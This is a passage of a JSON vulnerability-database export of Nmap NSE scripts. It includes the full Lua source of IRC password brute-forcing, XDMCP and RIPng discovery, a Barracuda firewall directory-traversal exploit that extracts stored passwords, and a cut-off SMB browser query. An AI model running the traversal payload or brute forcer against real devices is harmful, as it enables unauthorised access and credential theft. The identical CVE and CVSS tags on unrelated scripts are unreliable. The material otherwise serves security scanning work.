) then\n err = \"The IRC service does not require authentication\"\n break\n elseif( code ) then\n break\n end\n end\n until(not(status))\n if (code == 464) then\n return true\n end\n if ( code ) then\n return false, (\"Failed to check password requirements, unknown code (%d)\"):format(code)\n else\n return false, \"Failed to check password requirements\"\n end\nend\n\n\naction = function(host, port)\n\n local status, err = needsPassword(host, port)\n if ( not(status) ) then\n return stdnse.format_output(false, err)\n end\n\n local engine = brute.Engine:new(Driver, host, port)\n engine.options.script_name = SCRIPT_NAME\n engine.options.firstonly = true\n engine.options.passonly = true\n local result\n status, result = engine:start()\n\n return result\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:37", "description": "Discovers servers running the X Display Manager Control Protocol (XDMCP) by sending a XDMCP broadcast request to the LAN. Display managers allowing access are marked using the keyword Willing in the result.\n\n## Script Arguments \n\n#### broadcast-xdmcp-discover.timeout \n\nsocket timeout (default: 5s)\n\n## Example Usage \n \n \n nmap --script broadcast-xdmcp-discover\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-xdmcp-discover:\n |_ 192.168.2.162 - Willing\n \n\n## Requires \n\n * [os](<>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [xdmcp](<../lib/xdmcp.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-26T19:35:19", "type": "nmap", "title": "broadcast-xdmcp-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:BROADCAST-XDMCP-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-xdmcp-discover.html", "sourceData": "local os = require \"os\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal xdmcp = require \"xdmcp\"\n\ndescription = [[\nDiscovers servers running the X Display Manager Control Protocol (XDMCP) by\nsending a XDMCP broadcast request to the LAN. Display managers allowing access\nare marked using the keyword Willing in the result.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-xdmcp-discover\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-xdmcp-discover:\n-- |_ 192.168.2.162 - Willing\n--\n-- @args broadcast-xdmcp-discover.timeout socket timeout (default: 5s)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nprerule = function() return true end\n\nlocal arg_timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\"))\n\naction = function()\n\n local host, port = { ip = \"255.255.255.255\" }, { number = 177, protocol = \"udp\" }\n local options = { timeout = 1 }\n local helper = xdmcp.Helper:new(host, port, options)\n local status = helper:connect()\n\n local req = xdmcp.Packet[xdmcp.OpCode.BCAST_QUERY]:new(nil)\n local status, err = helper:send(req)\n if ( not(status) ) then\n return false, err\n end\n\n local timeout = arg_timeout or 5\n local start = os.time()\n local result = {}\n repeat\n\n local status, response = helper:recv()\n if ( not(status) and response ~= \"TIMEOUT\" ) then\n break\n elseif ( status ) then\n local status, _, _, rhost = helper.socket:get_info()\n if ( response.header.opcode == xdmcp.OpCode.WILLING ) then\n result[rhost] = true\n else\n result[rhost] = false\n end\n end\n\n until( os.time() - start > timeout )\n\n local output = {}\n for ip, res in pairs(result) do\n if ( res ) then\n table.insert(output, (\"%s - Willing\"):format(ip))\n else\n table.insert(output, (\"%s - Unwilling\"):format(ip))\n end\n end\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:48", "description": "Discovers hosts and routing information from devices running RIPng on the LAN by sending a broadcast RIPng Request command and collecting any responses.\n\n## Script Arguments \n\n#### broadcast-ripng-discover.timeout \n\nsets the connection timeout (default: 5s)\n\n## Example Usage \n \n \n nmap --script broadcast-ripng-discover\n \n\n## Script Output \n \n \n | broadcast-ripng-discover:\n | fe80::a00:27ff:fe9a:880c\n | route metric next hop\n | fe80:470:0:0:0:0:0:0/64 1\n | fe80:471:0:0:0:0:0:0/64 1\n |_ fe80:472:0:0:0:0:0:0/64 1\n \n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-14T18:44:07", "type": "nmap", "title": "broadcast-ripng-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-08T17:07:00", "id": "NMAP:BROADCAST-RIPNG-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-ripng-discover.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\n\ndescription = [[\nDiscovers hosts and routing information from devices running RIPng on the\nLAN by sending a broadcast RIPng Request command and collecting any responses.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-ripng-discover\n--\n-- @output\n-- | broadcast-ripng-discover:\n-- | fe80::a00:27ff:fe9a:880c\n-- | route metric next hop\n-- | fe80:470:0:0:0:0:0:0/64 1\n-- | fe80:471:0:0:0:0:0:0/64 1\n-- |_ fe80:472:0:0:0:0:0:0/64 1\n--\n-- @args broadcast-ripng-discover.timeout sets the connection timeout\n-- (default: 5s)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nprerule = function() return ( nmap.address_family() == \"inet6\" ) end\n\nRIPng = {\n\n -- Supported RIPng commands\n Command = {\n Request = 1,\n Response = 2,\n },\n\n -- Route table entry\n RTE = {\n\n -- Creates a new Route Table Entry\n -- @param prefix string containing the ipv6 route prefix\n -- @param tag number containing the route tag\n -- @param prefix_len number containing the length in bits of the\n -- significant part of the prefix\n -- @param metric number containing the current metric for the\n -- destination\n new = function(self, prefix, tag, prefix_len, metric)\n local o = {\n prefix = prefix,\n tag = tag,\n prefix_len = prefix_len,\n metric = metric\n }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n -- Parses a byte string and creates an instance of RTE\n -- @param data string of bytes\n -- @return rte instance of RTE\n parse = function(data)\n local rte = RIPng.RTE:new()\n local pos, ip\n\n ip, rte.tag, rte.prefix_len, rte.metric, pos = string.unpack(\">c16 I2 BB\", data)\n rte.prefix = ipOps.str_to_ip(ip, 'inet6')\n return rte\n end,\n\n -- Converts a RTE instance to string\n -- @return string of bytes to send to the server\n __tostring = function(self)\n local ipstr = ipOps.ip_to_str(self.prefix)\n assert(16 == #ipstr, \"Invalid IPv6 address encountered\")\n return ipstr .. string.pack(\">I2 BB\", self.tag, self.prefix_len, self.metric)\n end,\n\n\n },\n\n -- The Request class contains functions to build a RIPv2 Request\n Request = {\n\n -- Creates a new Request instance\n --\n -- @param command number containing the RIPv2 Command to use\n -- @return o instance of request\n new = function(self, entries)\n local o = {\n command = 1,\n version = 1,\n entries = entries,\n }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n -- Converts the whole request to a string\n __tostring = function(self)\n local RESERVED = 0\n local str = {string.pack(\">BB I2\", self.command, self.version, RESERVED)}\n for _, rte in ipairs(self.entries) do\n str[#str+1] = tostring(rte)\n end\n return table.concat(str)\n end,\n\n },\n\n -- A RIPng Response\n Response = {\n\n -- Creates a new Response instance\n -- @return o new instance of Response\n new = function(self)\n local o = { }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n -- Creates a new Response instance based on a string of bytes\n -- @return resp new instance of Response\n parse = function(data)\n local resp = RIPng.Response:new()\n local pos, _\n\n resp.command, resp.version, _, pos = string.unpack(\">BB I2\", data)\n resp.entries = {}\n while( pos < #data ) do\n local e = RIPng.RTE.parse(data:sub(pos))\n table.insert(resp.entries, e)\n pos = pos + 20\n end\n\n return resp\n end,\n }\n}\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\n-- Parses a RIPng response\n-- @return ret string containing the routing table\nlocal function parse_response(resp)\n local next_hop\n local result = tab.new(3)\n tab.addrow(result, \"route\", \"metric\", \"next hop\")\n for _, rte in pairs(resp.entries or {}) do\n -- next hop information is specified in a separate RTE according to\n -- RFC 2080 section 2.1.1\n if ( 0xFF == rte.metric ) then\n next_hop = rte.prefix\n else\n tab.addrow(result, (\"%s/%d\"):format(rte.prefix, rte.prefix_len), rte.metric, next_hop or \"\")\n end\n end\n return tab.dump(result)\nend\n\naction = function()\n\n local req = RIPng.Request:new( { RIPng.RTE:new(\"0::\", 0, 0, 16) } )\n local host, port = \"FF02::9\", { number = 521, protocol = \"udp\" }\n local iface = nmap.get_interface()\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME..\".timeout\"))\n timeout = (timeout or 5) * 1000\n\n local sock = nmap.new_socket(\"udp\")\n sock:bind(nil, 521)\n sock:set_timeout(timeout)\n\n local status = sock:sendto(host, port, tostring(req))\n\n -- do we need to add the interface name to the address?\n if ( not(status) ) then\n if ( not(iface) ) then\n return fail(\"Couldn't determine what interface to use, try supplying it with -e\")\n end\n status = sock:sendto(host .. \"%\" .. iface, port, tostring(req))\n end\n\n if ( not(status) ) then\n return fail(\"Failed to send request to server\")\n end\n\n local responses = {}\n while(true) do\n local status, data = sock:receive()\n if ( not(status) ) then\n break\n else\n local status, _, _, rhost = sock:get_info()\n if ( not(status) ) then\n rhost = \"unknown\"\n end\n responses[rhost] = RIPng.Response.parse(data)\n end\n end\n\n local result = {}\n for ip, resp in pairs(responses) do\n stdnse.debug1(ip, resp)\n table.insert(result, { name = ip, parse_response(resp) } )\n end\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:44:54", "description": "Attempts to retrieve the configuration settings from a Barracuda Networks Spam & Virus Firewall device using the directory traversal vulnerability described at <http://seclists.org/fulldisclosure/2010/Oct/119>. \n\nThis vulnerability is in the \"locale\" parameter of \"/cgi-mod/view_help.cgi\" or \"/cgi-bin/view_help.cgi\", allowing the information to be retrieved from a MySQL database dump. The web administration interface runs on port 8000 by default. \n\nBarracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval Original exploit by ShadowHatesYou <Shadow@SquatThis.net> For more information, see: <http://seclists.org/fulldisclosure/2010/Oct/119> <http://www.exploit-db.com/exploits/15130/>\n\n## Script Arguments \n\n#### http-max-cache-size \n\nSet max cache size. The default value is 100,000. Barracuda config files vary in size mostly due to the number of users. Using a max cache size of 5,000,000 bytes should be enough for config files containing up to 5,000 users.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p <port> <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 8000/tcp open http syn-ack Barracuda Spam firewall http config\n | http-barracuda-dir-traversal:\n | Users: 256\n | Device: Barracuda Spam Firewall\n | Version: 4.1.0.0\n | Hostname: barracuda\n | Domain: example.com\n | Timezone: America/Chicago\n | Language: en_US\n | Password: 123456\n | API Password: 123456\n | MTA SASL LDAP Password: 123456\n | Gateway: 192.168.1.1\n | Primary DNS: 192.168.1.2\n | Secondary DNS: 192.168.1.3\n | DNS Cache: No\n | Backup Server: ftp.example.com\n | Backup Port: 21\n | Backup Type: ftp\n | Backup Username: user\n | Backup Password: 123456\n | NTP Enabled: Yes\n | NTP Server: update01.barracudanetworks.com\n | SSH Enabled: Yes\n | BRTS Enabled: No\n | BRTS Server: fp.bl.barracudanetworks.com\n | HTTP Port: 8000\n | HTTP Disabled: No\n | HTTPS Port: 443\n | HTTPS Only: No\n |\n | Vulnerable to directory traversal vulnerability:\n |_http://seclists.org/fulldisclosure/2010/Oct/119\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-06-28T23:43:34", "type": "nmap", "title": "http-barracuda-dir-traversal NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-BARRACUDA-DIR-TRAVERSAL.NSE", "href": "https://nmap.org/nsedoc/scripts/http-barracuda-dir-traversal.html", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to retrieve the configuration settings from a Barracuda\nNetworks Spam & Virus Firewall device using the directory traversal\nvulnerability described at\nhttp://seclists.org/fulldisclosure/2010/Oct/119.\n\nThis vulnerability is in the \"locale\" parameter of\n\"/cgi-mod/view_help.cgi\" or \"/cgi-bin/view_help.cgi\", allowing the\ninformation to be retrieved from a MySQL database dump. The web\nadministration interface runs on port 8000 by default.\n\nBarracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval\nOriginal exploit by ShadowHatesYou <Shadow@SquatThis.net>\nFor more information, see:\nhttp://seclists.org/fulldisclosure/2010/Oct/119\nhttp://www.exploit-db.com/exploits/15130/\n]]\n\n---\n-- @usage\n-- nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p <port> <host>\n--\n-- @args http-max-cache-size\n-- Set max cache size. The default value is 100,000.\n-- Barracuda config files vary in size mostly due to the number\n-- of users. Using a max cache size of 5,000,000 bytes should be\n-- enough for config files containing up to 5,000 users.\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 8000/tcp open http syn-ack Barracuda Spam firewall http config\n-- | http-barracuda-dir-traversal:\n-- | Users: 256\n-- | Device: Barracuda Spam Firewall\n-- | Version: 4.1.0.0\n-- | Hostname: barracuda\n-- | Domain: example.com\n-- | Timezone: America/Chicago\n-- | Language: en_US\n-- | Password: 123456\n-- | API Password: 123456\n-- | MTA SASL LDAP Password: 123456\n-- | Gateway: 192.168.1.1\n-- | Primary DNS: 192.168.1.2\n-- | Secondary DNS: 192.168.1.3\n-- | DNS Cache: No\n-- | Backup Server: ftp.example.com\n-- | Backup Port: 21\n-- | Backup Type: ftp\n-- | Backup Username: user\n-- | Backup Password: 123456\n-- | NTP Enabled: Yes\n-- | NTP Server: update01.barracudanetworks.com\n-- | SSH Enabled: Yes\n-- | BRTS Enabled: No\n-- | BRTS Server: fp.bl.barracudanetworks.com\n-- | HTTP Port: 8000\n-- | HTTP Disabled: No\n-- | HTTPS Port: 443\n-- | HTTPS Only: No\n-- |\n-- | Vulnerable to directory traversal vulnerability:\n-- |_http://seclists.org/fulldisclosure/2010/Oct/119\n--\n-- @changelog\n-- 2011-06-08 - created by Brendan Coles - itsecuritysolutions.org\n-- 2011-06-10 - added user count\n-- - looped path detection\n-- 2011-06-15 - looped system info extraction\n-- - changed service portrule to \"barracuda\"\n--\n\nauthor = \"Brendan Coles\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"exploit\", \"auth\"}\n\n\nportrule = shortport.port_or_service (8000, \"barracuda\", {\"tcp\"})\n\naction = function(host, port)\n\n local result = {}\n local paths = {\"/cgi-bin/view_help.cgi\", \"/cgi-mod/view_help.cgi\"}\n local payload = \"?locale=/../../../../../../../mail/snapshot/config.snapshot%00\"\n local user_count = 0\n local config_file = \"\"\n\n -- Loop through vulnerable files\n stdnse.debug1(\"Connecting to %s:%s\", host.targetname or host.ip, port.number)\n for _, path in ipairs(paths) do\n\n -- Retrieve file\n local data = http.get(host, port, tostring(path))\n if data and data.status then\n\n -- Check if file exists\n stdnse.debug1(\"HTTP %s: %s\", data.status, tostring(path))\n if tostring(data.status):match(\"200\") then\n\n -- Attempt config file retrieval with LFI exploit\n stdnse.debug1(\"Exploiting: %s\", tostring(path .. payload))\n data = http.get(host, port, tostring(path .. payload))\n if data and data.status and tostring(data.status):match(\"200\") and data.body and data.body ~= \"\" then\n\n -- Check if the HTTP response contains a valid config file in MySQL database dump format\n if string.match(data.body, \"DROP TABLE IF EXISTS config;\") and string.match(data.body, \"barracuda%.css\") then\n config_file = data.body\n break\n end\n\n else\n stdnse.debug1(\"Failed to retrieve file: %s\", tostring(path .. payload))\n end\n\n end\n\n else\n stdnse.debug1(\"Failed to retrieve file: %s\", tostring(path))\n end\n\n end\n\n -- No config file found\n if config_file == \"\" then\n stdnse.debug1(\"%s:%s is not vulnerable or connection timed out.\", host.targetname or host.ip, port.number)\n return\n end\n\n -- Extract system info from config file in MySQL dump format\n stdnse.debug1(\"Exploit success! Extracting system info from MySQL database dump\")\n\n -- Count users\n if string.match(config_file, \"'user_default_email_address',\") then\n for _ in string.gmatch(config_file, \"'user_default_email_address',\") do user_count = user_count + 1 end\n end\n table.insert(result, string.format(\"Users: %s\", user_count))\n\n -- Extract system info\n local vars = {\n {\"Device\", \"branding_device_name\"},\n {\"Version\",\"httpd_last_release_notes_version_read\"},\n {\"Hostname\",\"system_default_hostname\"},\n {\"Domain\",\"system_default_domain\"},\n {\"Timezone\",\"system_timezone\"},\n {\"Language\",\"default_ndr_lang\"},\n {\"Password\",\"system_password\"},\n {\"API Password\",\"api_password\"},\n {\"MTA SASL LDAP Password\",\"mta_sasl_ldap_advanced_password\"},\n {\"Gateway\",\"system_gateway\"},\n {\"Primary DNS\",\"system_primary_dns_server\"},\n {\"Secondary DNS\",\"system_secondary_dns_server\"},\n {\"DNS Cache\",\"dns_cache\"},\n {\"Backup Server\",\"backup_server\"},\n {\"Backup Port\",\"backup_port\"},\n {\"Backup Type\",\"backup_type\"},\n {\"Backup Username\",\"backup_username\"},\n {\"Backup Password\",\"backup_password\"},\n {\"NTP Enabled\",\"system_ntp\"},\n {\"NTP Server\",\"system_ntp_server\"},\n {\"SSH Enabled\",\"system_ssh_enable\"},\n {\"BRTS Enabled\",\"brts_enable\"},\n {\"BRTS Server\",\"brts_lookup_domain\"},\n {\"HTTP Port\",\"http_port\"},\n {\"HTTP Disabled\",\"http_shutoff\"},\n {\"HTTPS Port\",\"https_port\"},\n {\"HTTPS Only\",\"https_only\"},\n }\n for _, var in ipairs(vars) do\n local var_match = string.match(config_file, string.format(\"'%s','([^']+)','global',\", var[2]))\n if var_match then table.insert(result, string.format(\"%s: %s\", var[1], var_match)) end\n end\n\n table.insert(result, \"\\nVulnerable to directory traversal vulnerability:\\nhttp://seclists.org/fulldisclosure/2010/Oct/119\")\n\n -- Return results\n return stdnse.format_output(true, result)\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:25", "description": "Queries information managed by the Windows Master Browser.\n\n## Script Arguments \n\n#### smb-mbenum.format \n\n(optional) if set, changes the format of the result returned by the script. There are three possible formats: 1\\. Ordered by type horizontally 2\\. Ordered by type vertically 3\\. Ordered by type vertically with details (default)\n\n#### smb-mbenum.domain \n\n(optional) if not specified, lists the domain of the queried browser\n\n#### smb-mbenum.filter \n\n(optional) if set, queries the browser for a specific type of server (@see ServerTypes)\n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 445 <host> --script smb-mbenum\n \n\n## Script Output \n \n \n | smb-mbenum:\n | Backup Browser\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | DFS Root\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Master Browser\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | SQL Server\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Server\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Server service\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Windows NT/2000/XP/2003 server\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Workstation\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n |_ WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n \n\n## Requires \n\n * [msrpc](<../lib/msrpc.html>)\n * [smb](<../lib/smb.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-06-19T18:47:19", "type": "nmap", "title": "smb-mbenum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:SMB-MBENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-mbenum.html", "sourceData": "local msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\n\ndescription=[[\nQueries information managed by the Windows Master Browser.\n]]\n\n---\n-- @usage\n-- nmap -p 445 <host> --script smb-mbenum\n--\n-- @output\n-- | smb-mbenum:\n-- | Backup Browser\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | DFS Root\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Master Browser\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | SQL Server\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Server\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Server service\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Windows NT/2000/XP/2003 server\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Workstation\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- |_ WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n--\n-- @args smb-mbenum.format (optional) if set, changes the format of the result\n-- returned by the script. There are three possible formats:\n-- 1. Ordered by type horizontally\n-- 2. Ordered by type vertically\n-- 3. Ordered by type vertically with details (default)\n--\n-- @args smb-mbenum.filter (optional) if set, queries the browser for a\n-- specific type of server (@see ServerTypes)\n--\n-- @args smb-mbenum.domain (optional) if not specified, lists the domain of the queried browser\n--\n\n--\n-- Version 0.1\n-- Created 06/11/2011 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nhostrule = function(host) return smb.get_port(host) ~= nil end\n\nlocal function log(msg) stdnse.debug3(\"%s\", msg) end\n\nServerTypes = {\n SV_TYPE_WORKSTATION = 0x00000001,\n SV_TYPE_SERVER = 0x00000002,\n SV_TYPE_SQLSERVER = 0x00000004,\n SV_TYPE_DOMAIN_CTRL = 0x00000008,\n SV_TYPE_DOMAIN_BAKCTRL = 0x00000010,\n SV_TYPE_TIME_SOURCE = 0x00000020,\n SV_TYPE_AFP = 0x00000040,\n SV_TYPE_NOVELL = 0x00000080,\n SV_TYPE_DOMAIN_MEMBER = 0x00000100,\n SV_TYPE_PRINTQ_SERVER = 0x00000200,\n SV_TYPE_DIALIN_SERVER = 0x00000400,\n SV_TYPE_SERVER_UNIX = 0x00000800,\n SV_TYPE_NT = 0x00001000,\n SV_TYPE_WFW = 0x00002000,\n SV_TYPE_SERVER_MFPN = 0x00004000,\n SV_TYPE_SERVER_NT = 0x00008000,\n SV_TYPE_POTENTIAL_BROWSER = 0x00010000,\n SV_TYPE_BACKUP_BROWSER = 0x00020000,\n SV_TYPE_MASTER_BROWSER = 0x00040000,\n SV_TYPE_DOMAIN_MASTER = 0x00080000,\n SV_TYPE_WINDOWS = 0x00400000,\n SV_TYPE_DFS = 0x00800000,\n SV_TYPE_CLUSTER_NT = 0x01000000,\n SV_TYPE_TERMINALSERVER = 0x02000000,\n SV_TYPE_CLUSTER_VS_NT = 0x04000000,\n SV_TYPE_DCE = 0x10000000,\n SV_TYPE_ALTERNATE_XPORT = 0x20000000,\n SV_TYPE_LOCAL_LIST_ONLY = 0x40000000,\n SV_TYPE_DOMAIN_ENUM = 0x80000000,\n SV_TYPE_ALL = 0xFFFFFFFF\n}\n\nTypeNames = {\n SV_TYPE_WORKSTATION = { long = \"Workstation\", short = \"WKS\" },\n SV_TYPE_SERVER = { long = \"Server service\", short = 